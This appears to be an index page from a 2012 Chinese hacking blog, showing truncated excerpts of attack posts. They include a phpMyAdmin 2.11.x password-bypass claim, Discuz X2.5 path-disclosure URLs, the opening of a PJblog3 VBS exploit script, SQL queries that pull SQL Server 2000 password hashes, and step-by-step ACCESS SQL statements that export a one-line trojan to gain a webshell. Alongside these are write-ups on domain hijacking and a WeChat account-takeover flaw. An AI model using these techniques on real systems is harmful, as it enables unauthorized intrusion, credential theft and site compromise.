phpmyadmin 2.11.4万能密码漏洞

   
分类:安全 | 2012-12-12 | 撸过 3,626 次
0人扯蛋

phpmyadmin 2.11.4

phpmyadmin 2.11.3

两个版本都有此漏洞

我去测试了一下 确实可以用。。。

你们可以试一下

只需要输入账号  密码不需要输入
[......]

继续阅读

黑客进行域名劫持的几种方法总结

   
分类:安全 | 2012-12-12 | 撸过 4,461 次
0人扯蛋

一. 介绍

 
在2012年10月24日。社会化分享网站Diigo域名被盗,导致500万用户无法使用网站。
 
域名盗窃,也叫做域名劫持,不是新技术。早在2005年,SSAC报告就指出了多起域名劫持事件。域名劫持被定义为:从域名持有者获得非法域名的控制权
 
本文介绍了域名劫持的几种技术
 
二. 域名劫持的几种方法
有几种不同的劫持方法,1假扮域名注册人和域名注册商通信.2是伪造域名注册人在注册商处的账户信息,3.是伪造域名注册人的域名转移请求。4.是直接进行一次域名转移请求。5是修改域名的DNS记录
 
1.假扮域名注册人和域名注册商通信
这类域名盗窃包括使用伪造的传真,邮件等来修改域名注[......]

继续阅读

discuz X2.5 爆物理地址路径漏洞!

   
分类:安全 | 2012-12-5 | 撸过 2,942 次
0人扯蛋

三处:

http://www.webshell.cc/uc_server/control/admin/db.php
https://www.webshell.cc/source/plugin/myrepeats/table/table_myrepeats.php
https://www.webshell.cc/install/include/install_lang.php[......]

继续阅读

巴基斯坦谷歌、雅虎、苹果等大型网站遭黑客攻击

   
分类:新闻 | 2012-11-25 | 撸过 4,499 次
1人扯蛋

 

巴基斯坦的许多大型企业官方网站,包括谷歌、微软、雅虎、苹果、Visa、汇丰银行、可口可乐、Blogspot、索尼、惠普、eBay、PayPal都遭到了黑客攻击。来自媒体The Hackers Media的消息,这些网站是被一个土耳其黑客组织黑的。

另有三个域名:blog.microsoft.pk、adsense.google.com.pk以及code.google.pk也遭到了一个巴基斯坦黑客团体的攻击。巴基斯坦的黑客不仅宣布了攻击这些站点的原因,而且还公布了他们所发现的这些站点本身存在的漏洞。

“我们为什么浪费时间去黑巴基斯坦的网站?我们只是想传达我们的信息,我们先前已经[......]

继续阅读

御剑后台扫描工具 珍藏版

   
分类:工具 | 2012-11-21 | 撸过 5,094 次
2人扯蛋

 

本地:御剑后台扫描工具 珍藏版

网盘:御剑后台扫描工具 珍藏版[......]

继续阅读

利用QQ拼音纯净版漏洞可提权 Windows 8

   
分类:安全 | 2012-11-21 | 撸过 1,610 次
2人扯蛋

    发现这个漏洞的时候, 笔者正在机房上课。正想用3389远程桌面去控制宿舍电脑的时候,因为重做系统忘记自己的IP地址,因此就随手扫描了一下IP段开3389端口的电脑。没想到就随手扫描到一台WIN8的系统,而且这个系统还装了QQ输入法WIN8纯净版。

    当时我就想起初中时候的那个极品五笔的漏洞,就随手测试了一下,没想到在时隔7、8年后的今天,号称非常安全的WIN8系统居然还有如此大的漏洞。这边就把提权过程理一遍。
[......]

继续阅读

PJblog3漏洞利用说明

   
分类:安全 | 2012-11-9 | 撸过 2,056 次
0人扯蛋

真想不明白这样的漏洞这么久了官方为什么不修复 到现在还有此类漏洞  伸直更可怕的注册会员直插一句话

工具是用VBS写的,代码如下:

If WScript.Arguments.Count <> 2 Then
WScript.Echo "Usage: Cscript.exe Exp.vbs 要检测的论坛网址 要检测的用户名"
WScript.Echo "Example: Cscript.exe Exp.vbs https://www.webshell.cc puterjam"
WScript.Quit
End If
attackUrl = WScript.Arguments(0)
a[......]

继续阅读

各种类型数据库抓HASH破解最高权限密码!

   
分类:安全 | 2012-11-5 | 撸过 3,340 次
0人扯蛋

SQL Server 2000:-

SELECT password from master.dbo.sysxlogins where name='sa'

0×010034767D5C0CFA5FDCA28C4A56085E65E882E71CB0ED250341
2FD54D6119FFF04129A1D72E7C3194F7284A7F3A

0×0100- constant header
34767D5C- salt
0CFA5FDCA28C4A56085E65E882E71CB0ED250341- case senstive hash
2FD54D6119FFF04129A1D72E7C[......]

继续阅读

微信爆出漏洞!马化腾微信被盗!

   
分类:新闻 | 2012-10-21 | 撸过 4,513 次
3人扯蛋

    在前不久,有极客网友根据电话采访周鸿祎的视频拨号声,分析出了周鸿祎的电话号码。此事一经报道,立刻在社会中传播开来。极客探究和不留后患的做法甚至得到了社会各界的广泛认可。周鸿祎得知后亲自抛出了橄榄枝。19日下午,有网友向本网提供消息,在WooYun 论坛又有一位极具实力的极客(黑客),他通过利用微信账号安全的设置漏洞,成功地破解了多为名人的微信账号,并公布为证。

目前该极客已经成功破解了柳岩、马化腾的微信账号。不知他会不会得到马化腾的垂青呢?漏洞及破解具体过程如下:

今天发现个微信群发的漏洞。还没玩。就被修补了。

于是就有了这个漏洞的产生。

同样问题产生在重置用户密码的环节。[......]

继续阅读

ACCESS执行SQL语句导出一句话拿webshell

   
分类:安全 | 2012-10-12 | 撸过 3,515 次
1人扯蛋

实用环境,在access后台其他方法不能拿到webshell
但是后台有SQL语句查询执行,就可以直接access导出一句话拿webshell了
不过需要知道物理路径才能导出,利用IIS的解析漏洞导出EXCEL文件拿到webshell,因为ACCESS数据库不允许导出其他危险格式。
至于怎么拿到物理路径就看你自己发挥了,报错或备份路径等。

逐一执行以下语句就可以导出一句话了
第一句代码

create table cmd (a varchar(50))

第二句代码

insert into cmd (a) values ('一句话木马')

 
第三句代码

select * into [a] i[......]

继续阅读